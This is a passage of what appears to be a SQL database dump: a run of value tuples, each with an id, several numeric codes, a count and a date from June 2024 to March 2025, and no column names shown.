2024-06-30'),(2694,0,0,1,1775,1,1,'2024-06-30'),(2695,1,0,0,0,1,1,'2024-07-01'),(2696,9,0,0,135,1,1,'2024-07-01'),(2697,9,0,0,136,1,1,'2024-07-01'),(2698,9,0,0,85,1,1,'2024-07-01'),(2699,1,0,0,0,1,1,'2024-07-02'),(2700,1,0,0,0,1,1,'2024-07-03'),(2701,1,0,0,0,1,1,'2024-07-04'),(2702,0,0,1,1755,1,1,'2024-07-04'),(2703,1,0,0,0,1,2,'2024-07-05'),(2705,9,0,0,136,1,1,'2024-07-05'),(2706,0,0,1,1786,1,1,'2024-07-05'),(2707,1,0,0,0,1,2,'2024-07-06'),(2709,9,0,0,136,1,1,'2024-07-06'),(2710,1,0,0,0,1,1,'2024-07-08'),(2711,9,0,0,135,1,1,'2024-07-09'),(2712,0,0,1,1786,1,1,'2024-07-09'),(2713,1,0,0,0,1,1,'2024-07-09'),(2714,9,0,0,136,1,1,'2024-07-09'),(2715,1,0,0,0,1,8,'2024-07-10'),(2718,0,0,1,1755,1,2,'2024-07-10'),(2719,9,0,0,135,1,5,'2024-07-10'),(2720,0,0,1,1775,1,2,'2024-07-10'),(2721,9,0,0,85,1,2,'2024-07-10'),(2722,9,0,0,136,1,2,'2024-07-10'),(2726,0,0,1,1786,1,1,'2024-07-10'),(2737,1,0,0,0,1,8,'2024-07-11'),(2738,9,0,0,136,1,5,'2024-07-11'),(2740,0,0,1,1775,1,3,'2024-07-11'),(2741,9,0,0,135,1,3,'2024-07-11'),(2742,0,0,1,1755,1,3,'2024-07-11'),(2743,0,0,1,1786,1,2,'2024-07-11'),(2749,9,0,0,85,1,2,'2024-07-11'),(2763,1,0,0,0,1,1,'2024-07-12'),(2764,1,0,0,0,1,2,'2024-07-14'),(2766,0,0,1,1775,1,1,'2024-07-15'),(2767,1,0,0,0,1,1,'2024-07-16'),(2768,0,0,1,1755,1,1,'2024-07-16'),(2769,0,0,1,1786,1,1,'2024-07-16'),(2770,1,0,0,0,1,3,'2024-07-17'),(2773,1,0,0,0,1,1,'2024-07-18'),(2774,1,0,0,0,1,1,'2024-07-19'),(2775,0,0,1,1775,1,1,'2024-07-19'),(2776,1,0,0,0,1,2,'2024-07-20'),(2778,9,0,0,135,1,1,'2024-07-21'),(2779,1,0,0,0,1,1,'2024-07-22'),(2780,1,0,0,0,1,1,'2024-07-23'),(2781,1,0,0,0,1,2,'2024-07-24'),(2783,9,0,0,85,1,1,'2024-07-25'),(2784,1,0,0,0,1,2,'2024-07-25'),(2785,9,0,0,135,1,1,'2024-07-25'),(2786,0,0,1,1755,1,1,'2024-07-25'),(2787,0,0,1,1786,1,1,'2024-07-25'),(2788,9,0,0,136,1,1,'2024-07-25'),(2789,0,0,1,1775,1,1,'2024-07-25'),(2791,9,0,0,85,1,1,'2024-07-27'),(2792,1,0,0,0,1,1,'2024-07-27'),(2793,9,0,0,135,1,1,'2024-07-29'),(2794,1,0,0,0,1,1,'2024-07-29'),(2795,1,0,0,0,1,1,'2024-07-30'),(2796,1,0,0,0,1,1,'2024-07-31'),(2797,1,0,0,0,1,1,'2024-08-01'),(2798,1,0,0,0,1,1,'2024-08-02'),(2799,0,0,1,1786,1,1,'2024-08-02'),(2800,9,0,0,85,1,1,'2024-08-02'),(2801,9,0,0,135,1,1,'2024-08-03'),(2802,9,0,0,136,1,1,'2024-08-03'),(2803,9,0,0,85,1,1,'2024-08-03'),(2804,0,0,1,1755,1,1,'2024-08-05'),(2805,9,0,0,85,1,1,'2024-08-05'),(2806,0,0,1,1786,1,1,'2024-08-05'),(2807,0,0,1,1786,1,1,'2024-08-06'),(2808,0,0,1,1786,1,1,'2024-08-07'),(2809,0,0,1,1775,1,1,'2024-08-08'),(2810,0,0,1,1755,1,1,'2024-08-08'),(2811,1,0,0,0,1,1,'2024-08-08'),(2812,9,0,0,85,1,1,'2024-08-08'),(2813,9,0,0,136,1,1,'2024-08-09'),(2814,9,0,0,135,1,1,'2024-08-09'),(2815,0,0,1,1786,1,2,'2024-08-09'),(2816,1,0,0,0,1,1,'2024-08-09'),(2817,0,0,1,1775,1,1,'2024-08-09'),(2819,0,0,1,1755,1,2,'2024-08-10'),(2821,9,0,0,135,1,1,'2024-08-10'),(2822,1,0,0,0,1,1,'2024-08-10'),(2823,0,0,1,1755,1,1,'2024-08-11'),(2824,9,0,0,85,1,1,'2024-08-11'),(2825,1,0,0,0,1,2,'2024-08-11'),(2827,9,0,0,136,1,1,'2024-08-12'),(2828,0,0,1,1775,1,1,'2024-08-13'),(2829,9,0,0,85,1,1,'2024-08-13'),(2830,1,0,0,0,1,1,'2024-08-13'),(2831,1,0,0,0,1,2,'2024-08-14'),(2832,9,0,0,135,1,1,'2024-08-14'),(2833,9,0,0,136,1,1,'2024-08-14'),(2835,0,0,1,1786,1,1,'2024-08-14'),(2836,1,0,0,0,1,2,'2024-08-15'),(2837,0,0,1,1786,1,1,'2024-08-15'),(2838,9,0,0,136,1,1,'2024-08-15'),(2839,9,0,0,135,1,1,'2024-08-15'),(2841,0,0,1,1755,1,1,'2024-08-15'),(2842,0,0,1,1786,1,2,'2024-08-16'),(2843,1,0,0,0,1,2,'2024-08-16'),(2844,9,0,0,135,1,2,'2024-08-16'),(2845,0,0,1,1775,1,2,'2024-08-16'),(2846,9,0,0,136,1,2,'2024-08-16'),(2852,0,0,1,1786,1,1,'2024-08-17'),(2853,1,0,0,0,1,1,'2024-08-17'),(2854,0,0,1,1786,1,1,'2024-08-18'),(2855,9,0,0,85,1,1,'2024-08-18'),(2856,0,0,1,1755,1,1,'2024-08-18'),(2857,1,0,0,0,1,4,'2024-08-19'),(2861,9,0,0,136,1,1,'2024-08-19'),(2862,0,0,1,1775,1,1,'2024-08-20'),(2863,1,0,0,0,1,2,'2024-08-20'),(2864,9,0,0,135,1,1,'2024-08-20'),(2866,0,0,1,1786,1,1,'2024-08-20'),(2867,0,0,1,1775,1,1,'2024-08-21'),(2868,0,0,1,1786,1,1,'2024-08-22'),(2869,0,0,1,1755,1,1,'2024-08-22'),(2870,1,0,0,0,1,1,'2024-08-22'),(2871,0,0,1,1775,1,1,'2024-08-23'),(2872,9,0,0,135,1,1,'2024-08-23'),(2873,0,0,1,1786,1,1,'2024-08-23'),(2874,1,0,0,0,1,1,'2024-08-24'),(2875,9,0,0,85,1,1,'2024-08-25'),(2876,0,0,1,1786,1,1,'2024-08-25'),(2877,9,0,0,136,1,1,'2024-08-26'),(2878,1,0,0,0,1,1,'2024-08-28'),(2879,0,0,1,1775,1,1,'2024-08-30'),(2880,1,0,0,0,1,1,'2024-08-30'),(2881,0,0,1,1755,1,1,'2024-08-30'),(2882,0,0,1,1786,1,1,'2024-08-30'),(2883,9,0,0,136,1,1,'2024-08-30'),(2884,1,0,0,0,1,1,'2024-09-02'),(2885,9,0,0,135,1,1,'2024-09-03'),(2886,9,0,0,85,1,1,'2024-09-04'),(2887,0,0,1,1786,1,1,'2024-09-04'),(2888,0,0,1,1775,1,1,'2024-09-04'),(2889,1,0,0,0,1,1,'2024-09-07'),(2890,9,0,0,136,1,1,'2024-09-07'),(2891,0,0,1,1755,1,1,'2024-09-08'),(2892,0,0,1,1786,1,1,'2024-09-08'),(2893,0,0,1,1775,1,1,'2024-09-08'),(2894,9,0,0,136,1,1,'2024-09-09'),(2895,1,0,0,0,1,2,'2024-09-12'),(2896,0,0,1,1755,1,1,'2024-09-12'),(2897,0,0,1,1775,1,1,'2024-09-12'),(2899,0,0,1,1786,1,1,'2024-09-12'),(2900,9,0,0,135,1,1,'2024-09-13'),(2901,9,0,0,136,1,1,'2024-09-14'),(2902,0,0,1,1755,1,1,'2024-09-15'),(2903,9,0,0,136,1,1,'2024-09-15'),(2904,9,0,0,85,1,1,'2024-09-15'),(2905,0,0,1,1755,1,1,'2024-09-19'),(2906,1,0,0,0,1,1,'2024-09-19'),(2907,0,0,1,1775,1,1,'2024-09-19'),(2908,1,0,0,0,1,1,'2024-09-20'),(2909,1,0,0,0,1,1,'2024-09-21'),(2910,9,0,0,136,1,2,'2024-09-23'),(2911,9,0,0,135,1,1,'2024-09-23'),(2913,1,0,0,0,1,1,'2024-09-24'),(2914,0,0,1,1755,1,1,'2024-09-24'),(2915,0,0,1,1775,1,1,'2024-09-24'),(2916,0,0,1,1786,1,1,'2024-09-24'),(2917,9,0,0,136,1,1,'2024-09-24'),(2918,1,0,0,0,1,3,'2024-09-25'),(2919,9,0,0,85,1,1,'2024-09-25'),(2920,0,0,1,1786,1,3,'2024-09-25'),(2922,9,0,0,135,1,2,'2024-09-25'),(2924,0,0,1,1775,1,1,'2024-09-25'),(2926,9,0,0,136,1,3,'2024-09-25'),(2929,0,0,1,1755,1,2,'2024-09-25'),(2933,9,0,0,136,1,1,'2024-09-26'),(2934,9,0,0,85,1,1,'2024-09-26'),(2935,0,0,1,1775,1,2,'2024-09-28'),(2937,0,0,1,1786,1,2,'2024-09-30'),(2939,9,0,0,85,1,1,'2024-09-30'),(2940,0,0,1,1786,1,1,'2024-10-01'),(2941,1,0,0,0,1,1,'2024-10-01'),(2942,9,0,0,136,1,1,'2024-10-03'),(2943,1,0,0,0,1,1,'2024-10-03'),(2944,9,0,0,136,1,1,'2024-10-04'),(2945,1,0,0,0,1,2,'2024-10-08'),(2946,9,0,0,136,1,1,'2024-10-08'),(2947,9,0,0,135,1,1,'2024-10-08'),(2948,0,0,1,1786,1,1,'2024-10-08'),(2950,0,0,1,1755,1,1,'2024-10-08'),(2951,0,0,1,1755,1,1,'2024-10-09'),(2952,1,0,0,0,1,1,'2024-10-09'),(2953,0,0,1,1775,1,1,'2024-10-09'),(2954,0,0,1,1786,1,1,'2024-10-09'),(2955,1,0,0,0,1,1,'2024-10-10'),(2956,9,0,0,136,1,1,'2024-10-10'),(2957,0,0,1,1755,1,1,'2024-10-14'),(2958,0,0,1,1786,1,1,'2024-10-15'),(2959,1,0,0,0,1,1,'2024-10-16'),(2960,9,0,0,136,1,1,'2024-10-16'),(2961,1,0,0,0,1,1,'2024-10-17'),(2962,9,0,0,136,1,1,'2024-10-17'),(2963,9,0,0,85,1,1,'2024-10-18'),(2964,0,0,1,1755,1,1,'2024-10-18'),(2965,9,0,0,135,1,1,'2024-10-20'),(2966,0,0,1,1786,1,1,'2024-10-20'),(2967,1,0,0,0,1,1,'2024-10-21'),(2968,0,0,1,1755,1,1,'2024-10-23'),(2969,1,0,0,0,1,1,'2024-10-23'),(2970,0,0,1,1786,1,1,'2024-10-24'),(2971,0,0,1,1755,1,1,'2024-10-26'),(2972,1,0,0,0,1,1,'2024-10-28'),(2973,0,0,1,1775,1,1,'2024-10-29'),(2974,0,0,1,1786,1,1,'2024-10-29'),(2975,9,0,0,136,1,1,'2024-10-30'),(2976,1,0,0,0,1,3,'2024-10-30'),(2978,0,0,1,1755,1,1,'2024-10-30'),(2980,9,0,0,135,1,2,'2024-10-31'),(2981,9,0,0,136,1,1,'2024-10-31'),(2983,9,0,0,85,1,1,'2024-10-31'),(2984,0,0,1,1786,1,1,'2024-10-31'),(2985,0,0,1,1755,1,1,'2024-10-31'),(2986,0,0,1,1775,1,1,'2024-10-31'),(2987,1,0,0,0,1,4,'2024-10-31'),(2991,1,0,0,0,1,1,'2024-11-01'),(2992,1,0,0,0,1,1,'2024-11-02'),(2993,0,0,1,1786,1,1,'2024-11-02'),(2994,0,0,1,1755,1,1,'2024-11-03'),(2995,1,0,0,0,1,1,'2024-11-03'),(2996,9,0,0,136,1,3,'2024-11-04'),(2998,9,0,0,135,1,2,'2024-11-04'),(3001,0,0,1,1775,1,2,'2024-11-04'),(3002,0,0,1,1755,1,2,'2024-11-04'),(3003,0,0,1,1786,1,1,'2024-11-04'),(3006,9,0,0,85,1,1,'2024-11-04'),(3007,1,0,0,0,1,5,'2024-11-04'),(3012,1,0,0,0,1,1,'2024-11-06'),(3013,0,0,1,1755,1,1,'2024-11-06'),(3014,9,0,0,85,1,1,'2024-11-06'),(3015,9,0,0,136,1,1,'2024-11-06'),(3016,9,0,0,135,1,1,'2024-11-06'),(3017,1,0,0,0,1,2,'2024-11-07'),(3019,9,0,0,136,1,1,'2024-11-07'),(3020,0,0,1,1786,1,1,'2024-11-08'),(3021,1,0,0,0,1,3,'2024-11-08'),(3024,0,0,1,1755,1,1,'2024-11-09'),(3025,1,0,0,0,1,1,'2024-11-09'),(3026,1,0,0,0,1,2,'2024-11-10'),(3027,9,0,0,136,1,1,'2024-11-10'),(3028,9,0,0,85,1,1,'2024-11-10'),(3029,9,0,0,135,1,1,'2024-11-10'),(3031,9,0,0,135,1,1,'2024-11-11'),(3032,0,0,1,1755,1,1,'2024-11-11'),(3033,0,0,1,1775,1,1,'2024-11-11'),(3034,0,0,1,1786,1,1,'2024-11-11'),(3035,1,0,0,0,1,4,'2024-11-12'),(3038,0,0,1,1755,1,1,'2024-11-12'),(3039,0,0,1,1775,1,1,'2024-11-12'),(3040,9,0,0,136,1,1,'2024-11-12'),(3042,9,0,0,85,1,1,'2024-11-13'),(3043,1,0,0,0,1,1,'2024-11-13'),(3044,9,0,0,136,1,1,'2024-11-13'),(3045,9,0,0,135,1,1,'2024-11-13'),(3046,0,0,1,1775,1,1,'2024-11-14'),(3047,0,0,1,1786,1,1,'2024-11-16'),(3048,1,0,0,0,1,1,'2024-11-17'),(3049,1,0,0,0,1,1,'2024-11-18'),(3050,9,0,0,136,1,1,'2024-11-18'),(3051,9,0,0,135,1,1,'2024-11-18'),(3052,0,0,1,1786,1,1,'2024-11-18'),(3053,0,0,1,1775,1,1,'2024-11-18'),(3054,0,0,1,1755,1,1,'2024-11-18'),(3055,9,0,0,85,1,1,'2024-11-18'),(3056,0,0,1,1786,1,1,'2024-11-20'),(3057,1,0,0,0,1,2,'2024-11-20'),(3059,0,0,1,1755,1,1,'2024-11-20'),(3060,9,0,0,136,1,2,'2024-11-21'),(3061,0,0,1,1755,1,1,'2024-11-21'),(3062,0,0,1,1775,1,1,'2024-11-21'),(3063,0,0,1,1786,1,1,'2024-11-21'),(3065,9,0,0,85,1,1,'2024-11-21'),(3066,9,0,0,135,1,1,'2024-11-21'),(3067,1,0,0,0,1,1,'2024-11-21'),(3068,1,0,0,0,1,1,'2024-11-23'),(3069,1,0,0,0,1,1,'2024-11-24'),(3070,0,0,1,1755,1,1,'2024-11-24'),(3071,1,0,0,0,1,2,'2024-11-25'),(3073,1,0,0,0,1,1,'2024-11-26'),(3074,0,0,1,1775,1,1,'2024-11-29'),(3075,9,0,0,135,1,1,'2024-11-30'),(3076,9,0,0,136,1,1,'2024-11-30'),(3077,1,0,0,0,1,1,'2024-12-01'),(3078,9,0,0,85,1,1,'2024-12-02'),(3079,9,0,0,136,1,1,'2024-12-02'),(3080,0,0,1,1755,1,1,'2024-12-02'),(3081,1,0,0,0,1,1,'2024-12-03'),(3082,0,0,1,1775,1,1,'2024-12-03'),(3083,9,0,0,135,1,1,'2024-12-03'),(3084,9,0,0,85,1,1,'2024-12-04'),(3085,9,0,0,136,1,2,'2024-12-04'),(3087,0,0,1,1775,1,1,'2024-12-04'),(3088,0,0,1,1775,1,1,'2024-12-06'),(3089,1,0,0,0,1,1,'2024-12-06'),(3090,0,0,1,1775,1,1,'2024-12-07'),(3091,1,0,0,0,1,1,'2024-12-07'),(3092,0,0,1,1786,1,1,'2024-12-07'),(3093,9,0,0,136,1,1,'2024-12-07'),(3094,1,0,0,0,1,3,'2024-12-08'),(3095,0,0,1,1775,1,1,'2024-12-08'),(3097,0,1,0,0,21,1,'2024-12-08'),(3099,0,1,0,0,21,1,'2024-12-09'),(3100,1,0,0,0,1,1,'2024-12-09'),(3101,0,0,1,1755,1,1,'2024-12-09'),(3102,1,0,0,0,1,1,'2024-12-10'),(3103,0,0,1,1775,1,1,'2024-12-11'),(3104,1,0,0,0,1,2,'2024-12-11'),(3105,0,0,1,1786,1,1,'2024-12-11'),(3107,0,0,1,1755,1,1,'2024-12-11'),(3108,0,0,1,1786,1,1,'2024-12-12'),(3109,9,0,0,135,1,1,'2024-12-12'),(3110,1,0,0,0,1,2,'2024-12-12'),(3112,1,0,0,0,1,2,'2024-12-13'),(3114,1,0,0,0,1,1,'2024-12-14'),(3115,0,0,1,1775,1,1,'2024-12-14'),(3116,0,1,0,0,21,1,'2024-12-15'),(3117,1,0,0,0,1,1,'2024-12-15'),(3118,9,0,0,85,1,1,'2024-12-15'),(3119,0,0,1,1755,1,1,'2024-12-16'),(3120,9,0,0,136,1,1,'2024-12-18'),(3121,0,0,1,1755,1,1,'2024-12-18'),(3122,1,0,0,0,1,1,'2024-12-19'),(3123,0,0,1,1755,1,1,'2024-12-21'),(3124,0,0,1,1786,1,1,'2024-12-21'),(3125,1,0,0,0,1,1,'2024-12-22'),(3126,0,0,1,1755,1,1,'2024-12-22'),(3127,0,0,1,1786,1,2,'2024-12-23'),(3128,1,0,0,0,1,1,'2024-12-23'),(3130,9,0,0,135,1,1,'2024-12-23'),(3131,0,0,1,1755,1,1,'2024-12-24'),(3132,0,0,1,1786,1,1,'2024-12-24'),(3133,0,0,1,1775,1,1,'2024-12-26'),(3134,1,0,0,0,1,1,'2024-12-26'),(3135,0,0,1,1786,1,1,'2024-12-27'),(3136,9,0,0,85,1,1,'2024-12-27'),(3137,9,0,0,136,1,1,'2024-12-27'),(3138,0,0,1,1755,1,2,'2024-12-27'),(3139,0,0,1,1775,1,2,'2024-12-27'),(3140,9,0,0,135,1,2,'2024-12-27'),(3144,0,0,1,1786,1,1,'2024-12-28'),(3145,0,0,1,1786,1,1,'2024-12-29'),(3146,1,0,0,0,1,1,'2024-12-30'),(3147,0,0,1,1775,1,1,'2024-12-31'),(3148,9,0,0,136,1,2,'2025-01-01'),(3149,1,0,0,0,1,2,'2025-01-01'),(3150,0,0,1,1755,1,1,'2025-01-01'),(3151,0,0,1,1775,1,1,'2025-01-01'),(3152,0,0,1,1786,1,1,'2025-01-01'),(3154,9,0,0,85,1,1,'2025-01-01'),(3155,9,0,0,135,1,1,'2025-01-01'),(3157,9,0,0,136,1,1,'2025-01-02'),(3158,1,0,0,0,1,1,'2025-01-02'),(3159,9,0,0,135,1,1,'2025-01-03'),(3160,1,0,0,0,1,3,'2025-01-03'),(3163,1,0,0,0,1,1,'2025-01-04'),(3164,9,0,0,135,1,1,'2025-01-04'),(3165,0,0,1,1755,1,1,'2025-01-04'),(3166,0,0,1,1775,1,1,'2025-01-04'),(3167,0,0,1,1775,1,1,'2025-01-05'),(3168,1,0,0,0,1,1,'2025-01-05'),(3169,0,0,1,1755,1,1,'2025-01-05'),(3170,0,0,1,1755,1,3,'2025-01-07'),(3171,1,0,0,0,1,4,'2025-01-07'),(3173,9,0,0,85,1,1,'2025-01-07'),(3174,0,0,1,1786,1,1,'2025-01-07'),(3176,9,0,0,135,1,2,'2025-01-07'),(3178,0,0,1,1775,1,1,'2025-01-07'),(3180,9,0,0,136,1,3,'2025-01-07'),(3185,0,0,1,1775,1,2,'2025-01-09'),(3186,0,0,1,1786,1,1,'2025-01-09'),(3187,0,0,1,1755,1,1,'2025-01-09'),(3188,9,0,0,136,1,1,'2025-01-09'),(3189,9,0,0,85,1,1,'2025-01-09'),(3190,9,0,0,135,1,1,'2025-01-09'),(3191,1,0,0,0,1,1,'2025-01-09'),(3193,9,0,0,135,1,1,'2025-01-10'),(3194,0,0,1,1755,1,1,'2025-01-12'),(3195,0,0,1,1775,1,1,'2025-01-12'),(3196,0,0,1,1786,1,1,'2025-01-12'),(3197,9,0,0,85,1,1,'2025-01-12'),(3198,9,0,0,136,1,1,'2025-01-12'),(3199,9,0,0,135,1,1,'2025-01-12'),(3200,1,0,0,0,1,1,'2025-01-12'),(3201,0,0,1,1755,1,1,'2025-01-13'),(3202,1,0,0,0,1,2,'2025-01-14'),(3204,0,0,1,1775,1,1,'2025-01-14'),(3205,1,0,0,0,1,2,'2025-01-15'),(3207,0,0,1,1786,1,1,'2025-01-15'),(3208,0,0,1,1775,1,1,'2025-01-15'),(3209,9,0,0,135,1,1,'2025-01-15'),(3210,9,0,0,136,1,1,'2025-01-15'),(3211,0,0,1,1755,1,5,'2025-01-16'),(3212,0,0,1,1786,1,3,'2025-01-16'),(3213,9,0,0,85,1,3,'2025-01-16'),(3214,9,0,0,136,1,6,'2025-01-16'),(3216,1,0,0,0,1,8,'2025-01-16'),(3219,9,0,0,135,1,4,'2025-01-16'),(3220,0,0,1,1775,1,4,'2025-01-16'),(3244,0,0,1,1786,1,1,'2025-01-17'),(3245,1,0,0,0,1,1,'2025-01-17'),(3246,0,0,1,1755,1,2,'2025-01-18'),(3247,0,0,1,1775,1,2,'2025-01-18'),(3248,0,0,1,1786,1,3,'2025-01-18'),(3249,9,0,0,136,1,2,'2025-01-18'),(3250,9,0,0,85,1,1,'2025-01-18'),(3251,9,0,0,135,1,2,'2025-01-18'),(3253,0,1,0,0,21,1,'2025-01-18'),(3254,1,0,0,0,1,2,'2025-01-18'),(3261,0,0,1,1786,1,1,'2025-01-20'),(3262,0,0,1,1775,1,2,'2025-01-20'),(3263,1,0,0,0,1,4,'2025-01-20'),(3264,9,0,0,85,1,1,'2025-01-20'),(3268,9,0,0,136,1,3,'2025-01-20'),(3270,0,0,1,1755,1,2,'2025-01-20'),(3274,9,0,0,135,1,2,'2025-01-20'),(3276,0,0,1,1755,1,1,'2025-01-21'),(3277,9,0,0,136,1,1,'2025-01-21'),(3278,1,0,0,0,1,1,'2025-01-21'),(3279,1,0,0,0,1,1,'2025-01-22'),(3280,9,0,0,136,1,1,'2025-01-23'),(3281,0,0,1,1755,1,1,'2025-01-23'),(3282,0,0,1,1786,1,2,'2025-01-23'),(3284,0,0,1,1775,1,1,'2025-01-24'),(3285,0,0,1,1755,1,1,'2025-01-25'),(3286,0,0,1,1786,1,1,'2025-01-25'),(3287,1,0,0,0,1,2,'2025-01-26'),(3289,0,0,1,1755,1,1,'2025-01-27'),(3290,9,0,0,135,1,2,'2025-01-27'),(3291,9,0,0,136,1,1,'2025-01-27'),(3292,0,0,1,1775,1,1,'2025-01-27'),(3293,1,0,0,0,1,2,'2025-01-27'),(3296,0,0,1,1775,1,1,'2025-01-28'),(3297,9,0,0,85,1,1,'2025-01-28'),(3298,9,0,0,136,1,1,'2025-01-28'),(3299,9,0,0,135,1,1,'2025-01-28'),(3300,0,0,1,1755,1,1,'2025-01-28'),(3301,0,0,1,1786,1,1,'2025-01-28'),(3302,1,0,0,0,1,3,'2025-01-29'),(3303,9,0,0,85,1,1,'2025-01-29'),(3304,0,0,1,1786,1,1,'2025-01-29'),(3306,9,0,0,135,1,2,'2025-01-29'),(3308,0,0,1,1775,1,1,'2025-01-29'),(3310,9,0,0,136,1,3,'2025-01-29'),(3313,0,0,1,1755,1,2,'2025-01-29'),(3315,1,0,0,0,1,1,'2025-01-30'),(3316,0,0,1,1775,1,1,'2025-01-30'),(3317,0,0,1,1786,1,1,'2025-01-31'),(3318,1,0,0,0,1,1,'2025-01-31'),(3319,0,0,1,1755,1,1,'2025-01-31'),(3320,0,0,1,1775,1,1,'2025-01-31'),(3321,9,0,0,135,1,1,'2025-01-31'),(3322,9,0,0,136,1,1,'2025-01-31'),(3323,9,0,0,85,1,1,'2025-02-03'),(3324,0,0,1,1786,1,1,'2025-02-03'),(3325,1,0,0,0,1,1,'2025-02-03'),(3326,9,0,0,136,1,1,'2025-02-03'),(3327,9,0,0,135,1,1,'2025-02-03'),(3328,0,0,1,1775,1,1,'2025-02-03'),(3329,1,0,0,0,1,2,'2025-02-04'),(3330,0,0,1,1786,1,1,'2025-02-04'),(3332,0,0,1,1786,1,1,'2025-02-05'),(3333,0,1,0,0,21,1,'2025-02-05'),(3334,1,0,0,0,1,1,'2025-02-05'),(3335,9,0,0,136,1,1,'2025-02-05'),(3336,1,0,0,0,1,4,'2025-02-06'),(3337,0,0,1,1775,1,2,'2025-02-06'),(3338,0,0,1,1755,1,2,'2025-02-06'),(3339,0,0,1,1786,1,1,'2025-02-06'),(3343,9,0,0,135,1,2,'2025-02-06'),(3347,9,0,0,136,1,3,'2025-02-06'),(3348,9,0,0,85,1,1,'2025-02-06'),(3351,1,0,0,0,1,2,'2025-02-07'),(3353,9,0,0,135,1,1,'2025-02-08'),(3354,9,0,0,136,1,1,'2025-02-08'),(3355,1,0,0,0,1,2,'2025-02-08'),(3357,1,0,0,0,1,1,'2025-02-10'),(3358,9,0,0,85,1,1,'2025-02-10'),(3359,0,0,1,1786,1,1,'2025-02-10'),(3360,0,0,1,1775,1,1,'2025-02-10'),(3361,0,0,1,1755,1,1,'2025-02-10'),(3362,1,0,0,0,1,1,'2025-02-11'),(3363,0,0,1,1755,1,1,'2025-02-11'),(3364,0,0,1,1775,1,3,'2025-02-12'),(3365,0,0,1,1786,1,1,'2025-02-12'),(3366,1,0,0,0,1,5,'2025-02-12'),(3368,0,0,1,1755,1,2,'2025-02-12'),(3372,9,0,0,135,1,2,'2025-02-12'),(3376,9,0,0,136,1,3,'2025-02-12'),(3379,9,0,0,85,1,1,'2025-02-12'),(3381,1,0,0,0,1,2,'2025-02-13'),(3383,0,0,1,1755,1,2,'2025-02-14'),(3384,1,0,0,0,1,1,'2025-02-14'),(3386,0,0,1,1755,1,1,'2025-02-15'),(3387,9,0,0,136,1,1,'2025-02-15'),(3388,1,0,0,0,1,2,'2025-02-15'),(3390,0,0,1,1775,1,1,'2025-02-16'),(3391,1,0,0,0,1,1,'2025-02-16'),(3392,0,0,1,1755,1,1,'2025-02-16'),(3393,9,0,0,136,1,1,'2025-02-17'),(3394,1,0,0,0,1,1,'2025-02-17'),(3395,1,0,0,0,1,1,'2025-02-18'),(3396,1,0,0,0,1,1,'2025-02-20'),(3397,1,0,0,0,1,1,'2025-02-21'),(3398,1,0,0,0,1,1,'2025-02-23'),(3399,0,0,1,1786,1,1,'2025-02-23'),(3400,1,0,0,0,1,3,'2025-02-24'),(3402,0,0,1,1786,1,1,'2025-02-24'),(3403,0,0,1,1755,1,1,'2025-02-24'),(3405,0,0,1,1755,1,1,'2025-02-25'),(3406,1,0,0,0,1,2,'2025-02-25'),(3408,1,0,0,0,1,4,'2025-02-26'),(3409,0,0,1,1755,1,2,'2025-02-26'),(3410,0,0,1,1775,1,2,'2025-02-26'),(3411,0,0,1,1786,1,1,'2025-02-26'),(3415,9,0,0,135,1,2,'2025-02-26'),(3419,9,0,0,136,1,3,'2025-02-26'),(3420,9,0,0,85,1,1,'2025-02-26'),(3423,0,0,1,1755,1,1,'2025-02-28'),(3424,1,0,0,0,1,2,'2025-02-28'),(3426,0,0,1,1786,1,1,'2025-03-01'),(3427,0,0,1,1775,1,1,'2025-03-02'),(3428,9,0,0,85,1,1,'2025-03-03'),(3429,9,0,0,136,1,1,'2025-03-04'),(3430,0,0,1,1775,1,2,'2025-03-04'),(3432,9,0,0,136,1,1,'2025-03-05'),(3433,1,0,0,0,1,1,'2025-03-05'),(3434,9,0,0,135,1,1,'2025-03-06'),(3435,0,0,1,1755,1,1,'2025-03-06'),(3436,0,0,1,1775,1,1,'2025-03-06'),(3437,0,0,1,1786,1,1,'2025-03-06'),(3438,1,0,0,0,1,2,'2025-03-06'),(3439,0,1,0,0,21,1,'2025-03-06'),(3440,9,0,0,136,1,1,'2025-03-06'),(3441,9,0,0,85,1,1,'2025-03-06'),(3443,9,0,0,136,1,2,'2025-03-07'),(3444,1,0,0,0,1,1,'2025-03-07'),(3445,9,0,0,135,1,1,'2025-03-07'),(3447,9,0,0,136,1,1,'2025-03-09'),(3448,1,0,0,0,1,2,'2025-03-10'),(3450,0,1,0,0,21,1,'2025-03-12'),(3451,1,0,0,0,1,2,'2025-03-13'),(3452,9,0,0,135,1,1,'2025-03-13'),(3453,0,0,1,1786,1,1,'2025-03-13'),(3454,9,0,0,136,1,1,'2025-03-13'),(3456,0,0,1,1786,1,1,'2025-03-14'),(3457,1,0,0,0,1,1,'2025-03-14'),(3458,1,0,0,0,1,1,'2025-03-15'),(3459,0,0,1,1775,1,1,'2025-03-15'),(3460,1,0,0,0,1,1,'2025-03-16'),(3461,0,0,1,1755,1,1,'2025-03-18'),(3462,1,0,0,0,1,2,'2025-03-19'),(3463,9,0,0,136,1,1,'2025-03-19'),(3464,0,0,1,1775,1,1,'2025-03-19'),(3466,1,0,0,0,1,5,'2025-03-20'),(3467,9,0,0,15,1,1,'2025-03-20'),(3469,0,0,1,1755,1,2,'2025-03-20'),(3470,0,0,1,1775,1,2,'2025-03-20'),(3471,0,0,1,1786,1,1,'2025-03-20'),(3472,9,0,0,135,1,2,'2025-03-20'),(3473,9,0,0,136,1,3,'2025-03-20'),(3474,9,0,0,85,1,1,'2025-03-20'),(3483,1,0,0,0,1,1,'2025-03-21'),(3484,1,0,0,0,1,1,'2025-03-22'),(3485,0,0,1,1755,1,1,'2025-03-22'),(3486,0,0,1,1786,1,1,'2025-03-22'),(3487,0,0,1,1775,1,1,'2025-03-22'),(3488,9,0,0,136,1,1,'2025-03-23'),(3489,0,0,1,1775,1,1,'2025-03-23'),(3490,1,0,0,0,1,1,'2025-03-23'),(3491,9,0,0,85,1,2,'2025-03-24'),(3492,1,0,0,0,1,3,'2025-03-24'),(3496,9,0,0,85,1,1,'2025-03-25'),(3497,0,0,1,1755,1,1,'2025-03-26'),(3498,1,0,0,0,1,2,'2025-03-26'),(3499,0,0,1,1775,1,1,'2025-03-26'),(3501,1,0,0,0,1,1,'2025-03-27'),(3502,0,0,1,1775,1,1,'2025-03-28'),(3503,1,0,0,0,1,1,'2025-03-28'),(3504,0,0,1,1786,1,1,'2025-03-28'),(3505,1,0,0,0,1,2,'2025-03-29'),(3506,0,0,1,1786,1,1,'2025-03-29'),(3507,9,0,0,85,1,1,'2025-03-29'),(3508,9,0,0,135,1,1,'2025-03-29'),(3510,9,